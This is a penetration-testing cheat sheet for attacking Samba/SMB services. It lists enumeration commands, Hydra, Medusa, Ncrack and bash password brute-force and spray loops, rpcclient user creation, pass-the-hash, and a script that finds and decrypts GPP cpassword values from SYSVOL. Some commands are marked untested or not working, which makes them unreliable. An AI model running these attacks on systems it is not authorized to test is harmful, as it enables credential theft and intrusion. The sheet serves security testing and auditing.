Samba / SMB – port 445 / 139

Samba is a re-implementation of the SMB networking protocol that provides file and print services for Microsoft Windows clients. It is commonly included as a basic system service on Unix-based operating systems. The name Samba comes from SMB (Server Message Block), the standard protocol used by the Microsoft Windows network file system.

  • Port 139: SMB originally ran on top of NetBIOS using port 139. NetBIOS is an older transport layer that allows Windows computers to talk to each other on the same network.
  • Port 445: Later versions of SMB (after Windows 2000) began to use port 445 directly on top of TCP. Using TCP allows SMB to work over the internet.

Tools: Nmap, smbclient, crackmapexec, rpcclient, nbtscan, impacket-smbclient, Hydra

💡 Download sensitive information with Manspider.

Enumeration

💡 Scan for SMB shares using Crackmapexec.

crackmapexec

Get machine name, domain and OS.

crackmapexec smb $IP

Usernames & Groups

# -U [DOMAIN/]USERNAME[%PASSWORD]; -N = do not prompt for a password (null session)
rpcclient -N -U "" -c "enumdomusers" $IP
rpcclient -N -U "" -c "enumdomgroups" $IP
rpcclient -N -U "" -c "querygroup 0x200" $IP    # Change the group RID
rpcclient -N -U "" -c "queryuser myprecious" $IP  # Change the username
rpcclient -N -U "" -c "enumprivs" $IP

# Inside an authenticated rpcclient session (needs sufficient rights):
createdomuser myprecious
setuserinfo2 myprecious 24 Pr3cious@1
enumdomusers

smbclient

To find the Samba version, start Wireshark and then list the shares. Follow the TCP stream of the session to see the Samba version string.

smbclient -N -L $IP -U ""
smbclient -L $IP -U "${DOMAIN}/${USER}"
smbclient -L $IP -U "${DOMAIN}/${USER}%${PASS}"

nmap scripts

IP=x.x.x.x
ls -la /usr/share/nmap/scripts/smb*
nmap -sV -p 139,445 --script=smb-brute* -d $IP -oA nmap-smb-brute

This takes a very long time to run and might get blocked after a while.

nmap -Pn -sV -p 139,445 --script=smb* $IP -oA nmap-smb
nmap -Pn -sV -p 139,445 --script "smb* and not brute" $IP -oA nmap-smb

Nmap scan for SMB vulnerabilities

nmap -Pn -sV -p 139,445 --script=smb-vuln* -d $IP -oA nmap-smb-vuln
nmap -Pn -sV -p 139,445 --script=smb-vuln* --script-args=smbdomain=${DOMAIN},smbusername=${USER},smbpassword=${PASS} -d $IP -oA nmap-smb-vuln

nbtscan

When no one is logged into the computer, “User” will be the same as the computer name in “NetBIOS Name”.

# shows the user currently logged in (get the username)
nbtscan -r x.x.x.1-254
nbtscan -r -f IPs.txt

Use Metasploit to get information on smb shares

msfconsole
search scanner/smb
use auxiliary/scanner/smb/smb_enumshares
show options
set RHOSTS x.x.x.x
msf5 auxiliary(scanner/smb/smb_enumshares) > run

[+] x.x.x.x:445      - ADMIN$ - (DISK) Remote Admin
[+] x.x.x.x:445      - C$ - (DISK) Default share
[+] x.x.x.x:445      - IPC$ - (IPC) Remote IPC

Enum4Linux

See Enum4Linux.

Vulnerabilities

SMB Null Session

Older Microsoft Windows versions can be vulnerable to SMB null sessions. A session between two computers without a username and password was used for failover, so it will send all the information…

See SMB and Null Sessions: Why Your Pen Test is Probably Wrong.

smbclient -L $IP -U ""

rpcclient

rpcclient is used to connect to the NetBIOS port.

Pass-the-Hash is possible with "--pw-nt-hash".

# -U: user
rpcclient -U "" $IP
[don't enter a password]

# Log as anonymous user
rpcclient -U "" -N $IP

Brute force credentials

IP=x.x.x.x
WL=/usr/share/wordlists/rockyou.txt

Hydra

*** BEST OPTION ***

hydra -l "Administrator" -p "Password123" -t 1 $IP smb
hydra -L users.txt -P $WL -t 1 $IP smb

To validate a login against a specific share name. NOT TESTED YET.

hydra -t 1 -V -f -l administrator -P $WL smb://${IP}:445/ADMIN$

nmap scripts

NOTE: There is no warning or error message when the files are not found.

NOT WORKING YET… 🙁

nmap -p 139,445 --script=smb-brute --script-args smblockout=true,userdb=users.txt,passdb=${WL} $IP

Medusa

medusa -h $IP -u administrator -P $WL -M smbnt

Ncrack

ncrack -u administrator -P $WL smb://${IP}/ADMIN$

bash loop with smbclient

# Brute force password for administrator account (read the wordlist line by line)
while IFS= read -r PASSWORD; do echo "$PASSWORD" >> /root/smb.txt; smbclient //${IP}/Users "${PASSWORD}" -U administrator >> /root/smb.txt; done < "$WL"

# Check progress
grep -v NT_STATUS_LOGON_FAILURE /root/smb.txt | wc -w

password spray with rpcclient

NOT TESTED, BASED ON OTHER WEBSITE

PASSWORD="Abc123"
while IFS= read -r u; do
    echo -n "[*] user: $u " && rpcclient -U "${u}%${PASSWORD}" -c "getusername;quit" $IP
done < domain-users.txt

Access Samba shares

*** Best option *** See smbclient.

💡 Download sensitive information with Manspider.

rpcclient

After connecting:

# Show all available commands
help

srvinfo
get

# Domain password policy info
getdompwinfo
getusrdompwinfo <rid of user>

# Enumerate domain users
enumdomusers

# Query Specific User Information (including computers) by RID
queryuser <rid of user>

# Enumerate domain groups
enumdomgroups

# Group information and group membership
querygroup <rid of group>

With GUI

Open explorer window
Click on "+ Other Locations"
Connect to server
smb://smbserver/users_01$/username
Select "Registered User"
Domain: DOMAIN_NAME

smb://smbserver.domain/folder1/folder2/etc

With GUI – Kali

Open a Folder window in Kali. Click on Go->Open Location.

smb://user@${IP}/${SHARE}
smb://x.x.x.x/ADMIN$
smb://x.x.x.x/C$
smb://x.x.x.x/Data
smb://x.x.x.x/IPC$
smb://x.x.x.x/Secure$
smb://x.x.x.x/Users

SYSVOL

Passwords in SYSVOL

Groups.xml may contain cpassword. Download all the SMB share content. See smbclient.

Credential Storage in Group Policy Preferences (GPP)

When a new GPP is created, an associated XML file is created in SYSVOL with the relevant configuration data; if a password is provided, it is stored AES-256 encrypted. Microsoft published the AES key on MSDN, so anyone who can read the file can decrypt the password.

Search XML files containing "cpassword", the attribute that holds the AES-encrypted password. Use gpp-decrypt (already installed in Kali).

Use these commands to find and decrypt GPP passwords.

grep -Ri "cpassword" .
gpp-decrypt <cpassword>

Alternatively, use the custom script decrypt_cpassword.py: update the cpassword value in the script and leave the key as is.
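An added example (not the page's decrypt_cpassword.py and not gpp-decrypt itself) that audits a downloaded SYSVOL copy for cpassword attributes and decrypts them the way gpp-decrypt does; the function names, the constructed Groups.xml sample and the use of the cryptography package are assumptions:

```python
import base64
import os
import xml.etree.ElementTree as ET

# AES-256 key Microsoft published on MSDN for GPP cpassword (AES-CBC, zero IV).
GPP_AES_KEY = bytes.fromhex(
    "4e9906e8fcb66cc9faf49310620ffee8f496e806cc057990209b09a433b66c1b")

# Constructed sample in the shape of a SYSVOL Groups.xml; the cpassword is a
# made-up value of a plausible length, not a real encrypted password.
SAMPLE_GROUPS_XML = """<?xml version="1.0" encoding="utf-8"?>
<Groups>
  <User name="localadmin">
    <Properties action="U" userName="localadmin" neverExpires="1"
      cpassword="AzVJmXh/J9KrU5n0czX1uBPLSUjzFE8j7dOltPD8Qiw"/>
  </User>
</Groups>"""


def pad_b64(value):
    """GPP stores cpassword as base64 without '=' padding; restore it."""
    return value + "=" * (-len(value) % 4)


def find_cpasswords_in_xml(data, source="<string>"):
    """Return every element carrying a cpassword attribute in one XML document."""
    return [{"file": source, "tag": elem.tag, "cpassword": elem.attrib["cpassword"],
             "user": elem.get("userName") or elem.get("name", "")}
            for elem in ET.fromstring(data).iter() if "cpassword" in elem.attrib]


def find_cpasswords(root_dir):
    """Walk a SYSVOL copy (e.g. pulled with smbclient) and collect all hits."""
    hits = []
    for dirpath, _, files in os.walk(root_dir):
        for name in files:
            if name.lower().endswith(".xml"):
                path = os.path.join(dirpath, name)
                try:
                    with open(path, "rb") as fh:
                        hits.extend(find_cpasswords_in_xml(fh.read(), path))
                except ET.ParseError:
                    pass  # not a well-formed policy file, skip it
    return hits


def decrypt_cpassword(cpassword):
    """Decrypt like gpp-decrypt does; needs the 'cryptography' package (assumed)."""
    from cryptography.hazmat.primitives.ciphers import Cipher, algorithms, modes
    dec = Cipher(algorithms.AES(GPP_AES_KEY), modes.CBC(b"\x00" * 16)).decryptor()
    plain = dec.update(base64.b64decode(pad_b64(cpassword))) + dec.finalize()
    return plain[:-plain[-1]].decode("utf-16-le")  # strip PKCS#7, decode UTF-16LE
```

Run find_cpasswords() over the directory smbclient downloaded SYSVOL into; every hit is a credential that must be rotated and the preference removed, since the decryption key is public.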

Read .pol files

sudo pip3 install regpol
find . -name "*.pol"
regpol Registry.pol

SMB server on Kali Linux

💡 Use impacket-smbserver.

How to configure Samba server in Kali Linux

NOT TESTED

apt install samba
cd /etc/samba/
ls
rm -f smb.conf            # delete the old smb.conf
touch smb.conf            # create an empty smb.conf
ls
cat smb.conf              # check the content
nano smb.conf             # write the content
smbpasswd -a root         # create the Samba password for the user
service smbd start        # start the Samba file service
service nmbd start        # start the NetBIOS name service
cat /etc/samba/smb.conf   # check the content
cd
pwd

SCF File Attacks

See SMB Share – SCF File Attacks (pentestlab).